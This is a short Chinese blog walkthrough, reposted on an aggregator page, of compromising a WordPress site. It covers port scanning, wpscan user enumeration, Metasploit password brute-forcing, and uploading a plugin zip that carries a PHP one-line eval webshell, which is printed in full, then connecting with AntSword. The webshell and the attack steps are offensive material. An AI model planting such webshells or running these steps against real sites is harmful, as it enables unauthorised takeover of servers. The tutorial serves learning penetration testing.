渗透wordpress过程

这篇具有很好参考价值的文章主要介绍了渗透wordpress过程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

条件:

本地机在10.xx

Kali也在10.xx 且能联网

蚁剑工具

Nmap进行扫描端口,发现只有80端口开放

渗透wordpress过程

使用wpscan工具,进行扫描

wpscan --url https://www.xxxxxxx.wiki/ --enumerate u

扫描指定用户

渗透wordpress过程

发现有几个用户

渗透wordpress过程

用msf对这几个用户进行密码爆破

渗透wordpress过程

得出登陆密码

渗透wordpress过程

登陆进入192.168.10.40

渗透wordpress过程

利用插件漏洞,进行渗透

下载插件

渗透wordpress过程

下载后解压,把一句话木马放入

Yjh.php

<?php

    @eval($_POST[shell]);

?>

渗透wordpress过程

然后把该文件夹压缩为zip格式,上传插件

之后打开蚁剑

输入url地址为下

输入一句话密码,添加成功          

即获取网站shell

渗透wordpress过程文章来源地址https://www.toymoban.com/news/detail-416419.html

到了这里,关于渗透wordpress过程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 渗透-02:HTTPS主干-分支和HTTPS传输过程

    第一层,是主干的主干,加密通信就是双方都持有一个对称加密的秘钥,然后就可以安全通信了。 问题就是,无论这个最初的秘钥是由客户端传给服务端,还是服务端传给客户端,都是明文传输,中间人都可以知道。那就让这个过程变成密文就好了呗,而且还得是中间人解不

    2024年02月12日
    浏览(50)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(40)
  • DC-3靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描  3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 2. 密码爆破 3. 反弹shell 4. Get交互shell 四. Linux提权 1. 确定操作系统信息 2. 搜索操作系统漏洞 3. 利用exp提权 4. 找查flag 五. 收获总结 1. joomsca

    2023年04月15日
    浏览(82)
  • DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. 页面信息探测 二. 渗透过程 1. 用户登入爆破 2. 任意命令执行 3. 反弹shell 4. Linux提权(假) 4. Linux提权(真) 5. 查找flag 三. 收获总结 1. netcat反弹shell命令 2. teehee提权 DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip 搭

    2024年02月05日
    浏览(43)
  • Win10自带的邮件email上登录qq邮箱|解决无法访问此账户:xx问题

    首先进入QQ邮箱 点击“设置”后进入“账户” 往下滑,找到“ POP3/IMAP/SMTP/Exchange/CardDAV/CalDAV服务 ”板块 开启前3条服务,开启时需手动发送短信,0.1元一条 同样点击生成授权码,手机发送短信,获取授权码。 打开我们win10自带的邮件软件,找到“添加账户”,点击进入“高

    2024年02月05日
    浏览(103)
  • 概率论和随机过程的学习和整理20:条件概率我知道,但什么是条件期望?可用来解决递归问题

    目录 1 目标问题: 什么是条件期望? 条件期望有什么用? 2 条件期望,全期望公式 3 条件期望,全期望公式 和 条件概率,全概率公式的区别和联系 3.1 公式如下 3.2 区别和联系 3.3 概率和随机过程 4 有什么用:---可以解决很多递归的问题 4.1 使用前有个前提:界定清楚你要求

    2024年02月15日
    浏览(45)
  • 网络渗透day10-工具和技术

    以下为网络渗透的工具和技术。 让我更详细地描述网络渗透测试的各个阶段以及使用的工具。 1. 信息收集阶段: 目标识别: 在这一阶段,渗透测试人员确定测试的目标,例如特定的服务器、应用程序或网络。 开放源情报(OSINT)收集: 通过公开可用的信息,如WHOIS查询、社

    2024年02月09日
    浏览(32)
  • 网络安全竞赛——综合靶机渗透测试ZHCS-2全过程解析教程

    任务一:综合靶机渗透测试 任务环境说明: 服务器场景:ZHCS-2(关闭连接) 服务器场景操作系统:版本不详 扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23)   FLAG:22,80 扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)   FLAG: lighttpd 1.

    2024年02月09日
    浏览(42)
  • 2022-渗透测试-OWASP TOP10详细讲解

    2024年02月14日
    浏览(47)
  • 手机膜行业研究:市场规模也在逐年扩大

    随着智能手机的普及,手机钢化膜成为了消费者必备的配件之一。手机膜市场是一个庞大的市场,根据不同的材质和功能,有不同的市场分类。总体来说,手机膜市场的发展趋势是越来越高端,功能越来越多,品质越来越好。随着智能手机等电子产品的普及和消费者对手机保护

    2024年04月15日
    浏览(40)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包